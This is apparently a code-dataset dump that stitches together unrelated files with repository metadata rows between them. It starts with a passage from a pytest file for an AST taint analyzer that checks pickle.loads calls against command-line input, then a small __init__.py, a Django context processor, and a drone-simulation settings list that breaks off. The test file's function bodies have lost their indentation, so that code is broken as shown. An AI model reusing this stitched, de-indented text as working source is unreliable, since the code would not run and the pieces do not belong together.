'If', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=require_ready)'}, {'name': 'Load'}]}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=apps)'}, {'name': 'Load'}]}, {'name': 'str(str=check_models_ready)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}]}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=apps)'}, {'name': 'Load'}]}, {'name': 'str(str=check_apps_ready)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}]}]}, {'name': 'Try', 
'children': [{'name': 'Return', 'children': [{'name': 'Subscript', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models)'}, {'name': 'Load'}]}, {'name': 'Index', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=model_name)'}, {'name': 'Load'}]}, {'name': 'str(str=lower)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}]}, {'name': 'Load'}]}]}, {'name': 'ExceptHandler', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=KeyError)'}, {'name': 'Load'}]}, {'name': 'NoneType'}, {'name': 'Raise', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=LookupError)'}, {'name': 'Load'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=label)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=model_name)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'NoneType'}]}]}, {'name': 'list[]'}, {'name': 'list[]'}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=get_models)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=include_auto_created)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=include_swapped)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'NameConstant', 'children': [{'name': 'bool(int=False)'}]}, {'name': 'NameConstant', 'children': [{'name': 'bool(int=False)'}]}]}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=apps)'}, {'name': 'Load'}]}, {'name': 'str(str=check_models_ready)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}]}, {'name': 'For', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=model)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models)'}, {'name': 'Load'}]}, {'name': 'str(str=values)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'BoolOp', 'children': [{'name': 'And'}, {'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=model)'}, {'name': 'Load'}]}, {'name': 'str(str=_meta)'}, {'name': 'Load'}]}, {'name': 'str(str=auto_created)'}, {'name': 'Load'}]}, {'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Name', 'children': [{'name': 'str(str=include_auto_created)'}, {'name': 'Load'}]}]}]}, {'name': 'Continue'}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'BoolOp', 'children': [{'name': 'And'}, {'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=model)'}, {'name': 'Load'}]}, 
{'name': 'str(str=_meta)'}, {'name': 'Load'}]}, {'name': 'str(str=swapped)'}, {'name': 'Load'}]}, {'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Name', 'children': [{'name': 'str(str=include_swapped)'}, {'name': 'Load'}]}]}]}, {'name': 'Continue'}, {'name': 'list[]'}]}, {'name': 'Expr', 'children': [{'name': 'Yield', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=model)'}, {'name': 'Load'}]}]}]}, {'name': 'list[]'}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=import_models)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models)'}, {'name': 'Store'}]}, {'name': 'Subscript', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=apps)'}, {'name': 'Load'}]}, {'name': 'str(str=all_models)'}, {'name': 'Load'}]}, {'name': 'Index', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=label)'}, {'name': 'Load'}]}]}, {'name': 'Load'}]}]}, {'name': 'If', 'children': [{'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=module_has_submodule)'}, {'name': 'Load'}]}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=MODELS_MODULE_NAME)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=models_module_name)'}, {'name': 'Store'}]}, {'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=name)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=MODELS_MODULE_NAME)'}, {'name': 'Load'}]}, {'name': 'Load'}]}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models_module)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=import_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=models_module_name)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'list[]'}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=ready)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'list[]'}]}]}
assert add_node_id(a,1)
b={'name': 'Module', 'children': [{'name': 'Import', 'children': [{'name': 'sss'}]}]}
add_node_id(b, 1)
assert b=={'name': 'Module', 'id':1,'children': [{'name': 'Import', 'id':2,'children': [{'name': 'sss','id':3}]}]}
def test_get_node():
b = {'name': 'Module', 'id':1,'children': [{'name': 'Import', 'id':2,'children': [{'name': 'sss','id':3}]}]}
assert get_node(b,3)=={'name': 'sss', 'id': 3}
def test_get_name_value():
# case1
a={'name': 'Name', 'children': [{'name': 'str(str=data)', 'id': 374}, {'name': 'Store', 'id': 375}], 'id': 373}
assert get_name_value(a)=='str(str=data)'
# case2
a={'name': 'str(str=argv)', 'id': 35}
assert get_name_value(a)=='str(str=argv)'
# case3
a={'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 385}, {'name': 'Load', 'id': 386}], 'id': 384}, {'name': 'str(str=_current)', 'id': 387}, {'name': 'Load', 'id': 388}], 'id': 383}
assert get_name_value(a)=='self._current'
# case4
a={'name': 'keyword', 'children': [{'name': 'str(str=dir)', 'id': 36}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 39}, {'name': 'Load', 'id': 40}], 'id': 38}, {'name': 'str(str=_dir)', 'id': 41}, {'name': 'Load', 'id': 42}], 'id': 37}], 'id': 35}
assert get_name_value(a)=='str(str=dir)######self._dir'
def test_get_arg_value():
# see ./get_arg_value/demo.py
a={'name': 'arg', 'children': [{'name': 'str(str=a)', 'id': 6}, {'name': 'NoneType', 'id': 7}], 'id': 5}
assert get_arg_value(a)=='str(str=a)'
def test_get_all_assigns():
# demo code in test/get_all_assigns/demo.py
begin_id=2
end_id=45
node_dict={'name': 'Module', 'children': [{'name': 'FunctionDef', 'children': [{'name': 'str(str=set)', 'id': 3}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=a)', 'id': 6}, {'name': 'NoneType', 'id': 7}], 'id': 5}, {'name': 'arg', 'children': [{'name': 'str(str=b)', 'id': 9}, {'name': 'NoneType', 'id': 10}], 'id': 8}, {'name': 'NoneType', 'id': 11}, {'name': 'list[]', 'id': 12}, {'name': 'list[]', 'id': 13}, {'name': 'NoneType', 'id': 14}, {'name': 'list[]', 'id': 15}], 'id': 4}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=c)', 'id': 18}, {'name': 'Store', 'id': 19}], 'id': 17}, {'name': 'BinOp', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=a)', 'id': 22}, {'name': 'Load', 'id': 23}], 'id': 21}, {'name': 'Add', 'id': 24}, {'name': 'Name', 'children': [{'name': 'str(str=b)', 'id': 26}, {'name': 'Load', 'id': 27}], 'id': 25}], 'id': 20}], 'id': 16}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=pickle)', 'id': 32}, {'name': 'Load', 'id': 33}], 'id': 31}, {'name': 'str(str=loads)', 'id': 34}, {'name': 'Load', 'id': 35}], 'id': 30}, {'name': 'Name', 'children': [{'name': 'str(str=c)', 'id': 37}, {'name': 'Load', 'id': 38}], 'id': 36}, {'name': 'list[]', 'id': 39}], 'id': 29}], 'id': 28}, {'name': 'Return', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=c)', 'id': 42}, {'name': 'Load', 'id': 43}], 'id': 41}], 'id': 40}, {'name': 'list[]', 'id': 44}, {'name': 'NoneType', 'id': 45}], 'id': 2}], 'id': 1}
assert get_all_assigns(node_dict,(begin_id,end_id))=='left:str(str=a),right:fp$$$$$$left:str(str=b),right:fp$$$$$$left:str(str=c),right:str(str=a)######str(str=b)'
def test_get_all_functiondef():
#demo code in test/get_all_functiondef
node_dict={'name': 'Module', 'children': [{'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str', 'id': 4}], 'id': 3}], 'id': 2}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=Add)', 'id': 6}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=a)', 'id': 9}, {'name': 'NoneType', 'id': 10}], 'id': 8}, {'name': 'arg', 'children': [{'name': 'str(str=b)', 'id': 12}, {'name': 'NoneType', 'id': 13}], 'id': 11}, {'name': 'NoneType', 'id': 14}, {'name': 'list[]', 'id': 15}, {'name': 'list[]', 'id': 16}, {'name': 'NoneType', 'id': 17}, {'name': 'list[]', 'id': 18}], 'id': 7}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=c)', 'id': 21}, {'name': 'Store', 'id': 22}], 'id': 20}, {'name': 'BinOp', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=a)', 'id': 25}, {'name': 'Load', 'id': 26}], 'id': 24}, {'name': 'Add', 'id': 27}, {'name': 'Name', 'children': [{'name': 'str(str=b)', 'id': 29}, {'name': 'Load', 'id': 30}], 'id': 28}], 'id': 23}], 'id': 19}, {'name': 'Return', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=c)', 'id': 33}, {'name': 'Load', 'id': 34}], 'id': 32}], 'id': 31}, {'name': 'list[]', 'id': 35}, {'name': 'NoneType', 'id': 36}], 'id': 5}, {'name': 'ClassDef', 'children': [{'name': 'str(str=A)', 'id': 38}, {'name': 'list[]', 'id': 39}, {'name': 'list[]', 'id': 40}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=__init__)', 'id': 42}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)', 'id': 45}, {'name': 'NoneType', 'id': 46}], 'id': 44}, {'name': 'arg', 'children': [{'name': 'str(str=name)', 'id': 48}, {'name': 'NoneType', 'id': 49}], 'id': 47}, {'name': 'NoneType', 'id': 50}, {'name': 'list[]', 'id': 51}, {'name': 'list[]', 'id': 52}, {'name': 'NoneType', 'id': 53}, {'name': 'list[]', 'id': 54}], 'id': 43}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 58}, {'name': 'Load', 'id': 59}], 'id': 57}, {'name': 'str(str=name)', 'id': 60}, {'name': 'Store', 'id': 61}], 'id': 56}, {'name': 'Name', 'children': [{'name': 'str(str=name)', 'id': 63}, {'name': 'Load', 'id': 64}], 'id': 62}], 'id': 55}, {'name': 'list[]', 'id': 65}, {'name': 'NoneType', 'id': 66}], 'id': 41}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=func1)', 'id': 68}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)', 'id': 71}, {'name': 'NoneType', 'id': 72}], 'id': 70}, {'name': 'NoneType', 'id': 73}, {'name': 'list[]', 'id': 74}, {'name': 'list[]', 'id': 75}, {'name': 'NoneType', 'id': 76}, {'name': 'list[]', 'id': 77}], 'id': 69}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=pickle)', 'id': 82}, {'name': 'Load', 'id': 83}], 'id': 81}, {'name': 'str(str=loads)', 'id': 84}, {'name': 'Load', 'id': 85}], 'id': 80}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 88}, {'name': 'Load', 'id': 89}], 'id': 87}, {'name': 'str(str=name)', 'id': 90}, {'name': 'Load', 'id': 91}], 'id': 86}, {'name': 'list[]', 'id': 92}], 'id': 79}], 'id': 78}, {'name': 'Return', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 96}, {'name': 'Load', 'id': 97}], 'id': 95}, {'name': 'str(str=name)', 'id': 98}, {'name': 'Load', 'id': 99}], 'id': 94}], 'id': 
93}, {'name': 'list[]', 'id': 100}, {'name': 'NoneType', 'id': 101}], 'id': 67}, {'name': 'list[]', 'id': 102}], 'id': 37}], 'id': 1}
assert get_all_functiondef(node_dict)=='begin:5,end:36$$$$$$begin:41,end:66$$$$$$begin:67,end:101'
def test_get_all_classdef():
#demo code in test/get_all_classdef
node_dict={'name': 'Module', 'children': [{'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str', 'id': 4}], 'id': 3}], 'id': 2}, {'name': 'ClassDef', 'children': [{'name': 'str(str=A)', 'id': 6}, {'name': 'list[]', 'id': 7}, {'name': 'list[]', 'id': 8}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=__init__)', 'id': 10}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)', 'id': 13}, {'name': 'NoneType', 'id': 14}], 'id': 12}, {'name': 'arg', 'children': [{'name': 'str(str=name)', 'id': 16}, {'name': 'NoneType', 'id': 17}], 'id': 15}, {'name': 'NoneType', 'id': 18}, {'name': 'list[]', 'id': 19}, {'name': 'list[]', 'id': 20}, {'name': 'NoneType', 'id': 21}, {'name': 'list[]', 'id': 22}], 'id': 11}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 26}, {'name': 'Load', 'id': 27}], 'id': 25}, {'name': 'str(str=name)', 'id': 28}, {'name': 'Store', 'id': 29}], 'id': 24}, {'name': 'Name', 'children': [{'name': 'str(str=name)', 'id': 31}, {'name': 'Load', 'id': 32}], 'id': 30}], 'id': 23}, {'name': 'list[]', 'id': 33}, {'name': 'NoneType', 'id': 34}], 'id': 9}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=func1)', 'id': 36}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)', 'id': 39}, {'name': 'NoneType', 'id': 40}], 'id': 38}, {'name': 'NoneType', 'id': 41}, {'name': 'list[]', 'id': 42}, {'name': 'list[]', 'id': 43}, {'name': 'NoneType', 'id': 44}, {'name': 'list[]', 'id': 45}], 'id': 37}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=pickle)', 'id': 50}, {'name': 'Load', 'id': 51}], 'id': 49}, {'name': 'str(str=loads)', 'id': 52}, {'name': 'Load', 'id': 53}], 'id': 48}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 56}, {'name': 'Load', 'id': 57}], 'id': 55}, {'name': 'str(str=name)', 'id': 58}, {'name': 'Load', 'id': 59}], 'id': 54}, {'name': 'list[]', 'id': 60}], 'id': 47}], 'id': 46}, {'name': 'Return', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 64}, {'name': 'Load', 'id': 65}], 'id': 63}, {'name': 'str(str=name)', 'id': 66}, {'name': 'Load', 'id': 67}], 'id': 62}], 'id': 61}, {'name': 'list[]', 'id': 68}, {'name': 'NoneType', 'id': 69}], 'id': 35}, {'name': 'list[]', 'id': 70}], 'id': 5}], 'id': 1}
assert get_all_classdef(node_dict)=='begin:5,end:70'
def test_get_end_id():
# demo code in test/get_end_id
root={'name': 'FunctionDef', 'children': [{'name': 'str(str=func1)', 'id': 6}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)', 'id': 9}, {'name': 'NoneType', 'id': 10}], 'id': 8}, {'name': 'NoneType', 'id': 11}, {'name': 'list[]', 'id': 12}, {'name': 'list[]', 'id': 13}, {'name': 'NoneType', 'id': 14}, {'name': 'list[]', 'id': 15}], 'id': 7}, {'name': 'Expr', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=pickle)', 'id': 20}, {'name': 'Load', 'id': 21}], 'id': 19}, {'name': 'str(str=loads)', 'id': 22}, {'name': 'Load', 'id': 23}], 'id': 18}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 26}, {'name': 'Load', 'id': 27}], 'id': 25}, {'name': 'str(str=name)', 'id': 28}, {'name': 'Load', 'id': 29}], 'id': 24}, {'name': 'list[]', 'id': 30}], 'id': 17}], 'id': 16}, {'name': 'Return', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)', 'id': 34}, {'name': 'Load', 'id': 35}], 'id': 33}, {'name': 'str(str=name)', 'id': 36}, {'name': 'Load', 'id': 37}], 'id': 32}], 'id': 31}, {'name': 'list[]', 'id': 38}, {'name': 'NoneType', 'id': 39}], 'id': 5}
assert get_end_id(root)==35
def test_get_call_details():
#demo code in test/get_call_details
call_node={'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=pickle)', 'id': 24}, {'name': 'Load', 'id': 25}], 'id': 23}, {'name': 'str(str=loads)', 'id': 26}, {'name': 'Load', 'id': 27}], 'id': 22}, {'name': 'Name', 'children': [{'name': 'str(str=name)', 'id': 29}, {'name': 'Load', 'id': 30}], 'id': 28}, {'name': 'list[]', 'id': 31}], 'id': 21}
assert get_call_details(call_node)=='pickle.loads$$$$$$pickle$$$$$$str(str=name)'
def test_is_tracked():
#demo code in test/is_tracked/demo.py
# case1
assign_list=[('name', ['fp'])]
# case2
assign_list2=[('name', ['fp']), ('a', ['aaa']), ('b', ['bbb']), ('c', ['a', 'b'])]
# case3
assign_list3=[('name', ['fp']), ('a', ['aaa']), ('b', ['bbb']), ('c', ['a', 'b', 'name'])]
assert is_tracked(assign_list,'name')==True
assert is_tracked(assign_list2, 'c')!=True
assert is_tracked(assign_list3,'c')==True
def test_is_controllable():
# demo code in test/is_controllable
# case1
assign_list=[('name', ['fp']), ('a', ['aaa']), ('b', ['bbb', 'sys.argv']), ('c', ['a', 'b', 'name'])]
assert is_controllable(assign_list,'c')==[(['bbb', 'sys.argv'], 'sys.argv')]
def test_ins_is_class():
# demo code in test/ins_is_class
ins='ins'
all_assigns=[('self', ['fp']), ('a', ['fp']), ('b', ['a']), ('ins', ['A', 'b'])]
assert ins_is_class(ins,'A',all_assigns)==True
def test_get_class_name():
assert get_class_name('ClassCall:A.func1')=='A'
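# --- Hedged reference sketches (added for illustration; not from the repo under test) ---
# The helpers exercised above are imported from elsewhere. The minimal versions
# below merely satisfy the asserts in this file, assuming ids are assigned in
# depth-first pre-order; the real implementations may differ.
def add_node_id_sketch(node, next_id):
    # Assign 'id' in pre-order and return the next unused id (truthy, so
    # `assert add_node_id(a, 1)` above would also pass against this sketch).
    node['id'] = next_id
    next_id += 1
    for child in node.get('children', []):
        next_id = add_node_id_sketch(child, next_id)
    return next_id
def get_node_sketch(node, target_id):
    # Depth-first lookup of the subtree whose 'id' matches target_id.
    if node.get('id') == target_id:
        return node
    for child in node.get('children', []):
        found = get_node_sketch(child, target_id)
        if found is not None:
            return found
    return None
def get_class_name_sketch(label):
    # 'ClassCall:A.func1' -> 'A', per test_get_class_name above.
    return label.split(':', 1)[1].split('.', 1)[0]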
if __name__=='__main__':
pytest.main(['unit_test.py'])
| 382.854545 | 28,218 | 0.513986 | 4,926 | 42,114 | 4.340235 | 0.057856 | 0.290178 | 0.130496 | 0.18522 | 0.861787 | 0.82507 | 0.797381 | 0.768007 | 0.71899 | 0.686062 | 0 | 0.016237 | 0.10208 | 42,114 | 110 | 28,219 | 382.854545 | 0.549147 | 0.011825 | 0 | 0 | 0 | 0.029851 | 0.498485 | 0.030981 | 0 | 0 | 0 | 0 | 0.298507 | 1 | 0.208955 | false | 0 | 0.089552 | 0 | 0.298507 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
8773a3a97f1dd31235c04540710a7c61b8cf0441 | 49 | py | Python | project_alphavantage/modules/__init__.py | leonardomarcao/projecto-alphavantage | ce46065c7bcb01298867c5ed8562d5a73e0b69fe | ["MIT"] | null | null | null | project_alphavantage/modules/__init__.py | leonardomarcao/projecto-alphavantage | ce46065c7bcb01298867c5ed8562d5a73e0b69fe | ["MIT"] | 6 | 2020-02-16T21:05:51.000Z | 2020-02-17T03:23:56.000Z | project_alphavantage/modules/__init__.py | leonardomarcao/projecto-alphavantage | ce46065c7bcb01298867c5ed8562d5a73e0b69fe | ["MIT"] | 1 | 2020-02-17T16:03:47.000Z | 2020-02-17T16:03:47.000Z |
from . import db
from . import alpha_vantage_api
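# Hypothetical usage note (package name taken from the path above): the two
# imports re-export the submodules, so callers can write, e.g.
#     from project_alphavantage.modules import db, alpha_vantage_api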
| 16.333333 | 31 | 0.795918 | 8 | 49 | 4.625 | 0.75 | 0.540541 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163265 | 49 | 2 | 32 | 24.5 | 0.902439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5e5a37af62a89d6750c12567ab471b3edeca070c | 83 | py | Python | staging/contexts.py | Pyromanser/django-staging | 1273ba880f48705f968e85631f55af036b1dceb2 | ["BSD-3-Clause"] | null | null | null | staging/contexts.py | Pyromanser/django-staging | 1273ba880f48705f968e85631f55af036b1dceb2 | ["BSD-3-Clause"] | null | null | null | staging/contexts.py | Pyromanser/django-staging | 1273ba880f48705f968e85631f55af036b1dceb2 | ["BSD-3-Clause"] | 2 | 2021-06-07T23:09:19.000Z | 2021-06-09T21:27:55.000Z |
def data_generator_enabled(request):
return {'DATA_GENERATOR_ENABLED': True}
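# Hedged usage sketch (standard Django wiring, not shown in this file): a
# context processor only runs once registered in settings, e.g.
#     TEMPLATES[0]['OPTIONS']['context_processors'] += [
#         'staging.contexts.data_generator_enabled',
#     ]
# after which templates can test {% if DATA_GENERATOR_ENABLED %} ... {% endif %}.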
| 16.6 | 43 | 0.771084 | 10 | 83 | 6 | 0.7 | 0.433333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13253 | 83 | 4 | 44 | 20.75 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0.271605 | 0.271605 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
5e74954984ceb331e27a922b03178c98130a3b35 | 5,225 | py | Python | build/lib/drone_awe/validationsettings.py | rymanderson/Drone-Models | 396ed030f277a96365c7cbfaffb3d2006e5b12a8 | ["MIT"] | 2 | 2019-12-01T10:27:54.000Z | 2019-12-01T10:28:07.000Z | build/lib/drone_awe/validationsettings.py | rymanderson/drone_awe | 396ed030f277a96365c7cbfaffb3d2006e5b12a8 | ["MIT"] | null | null | null | build/lib/drone_awe/validationsettings.py | rymanderson/drone_awe | 396ed030f277a96365c7cbfaffb3d2006e5b12a8 | ["MIT"] | null | null | null |
params = [
{
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 85.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'missionspeed',
'ylabel': 'alpha',
'title': 'Stolaroff',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.0,
'xend': 15.0,
'xnumber': 10,
'validation': False,
'validationcase': 'Stolaroff2018',
'batterytechnology': 'current'
},
{
'validation': False,
'validationcase': 'Ostler2009',
'drone': True,
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 89.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'missionspeed',
'ylabel': 'power',
'title': 'Ostler2009',
'simulationtype': 'simple',
'xbegin': 0.0,
'xend': 30.0,
'xnumber': 20,
'batterytechnology': 'current'
},
{
'drone': True,
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 89.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'payload',
'ylabel': 'endurance',
'title': 'FreeFLY_Alta8',
'simulationtype': 'simple',
'xbegin': 0.0,
'xend': 10.0,
'xnumber': 100,
'validation': False,
'validationcase': 'FreeFLYAlta8',
